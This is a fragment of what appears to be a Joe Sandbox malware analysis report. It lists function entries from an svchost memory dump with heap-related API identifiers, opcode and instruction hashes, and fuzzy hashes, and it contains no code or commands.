                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 74E0E6B1651F45D4DF028F61E4901E877A5E758B94B889132DA5C47355EB78D1E5C300
                                                                          Function 000001F28C931BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: 4d82505500ce06d62ce877f2f89efa63fb9e64a04db03c9d2b6106834071bf2b
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: 67113A35641F8686EA54DB66A8082B967E1FB89FC0F1890B9DE4D57776EF38C442C300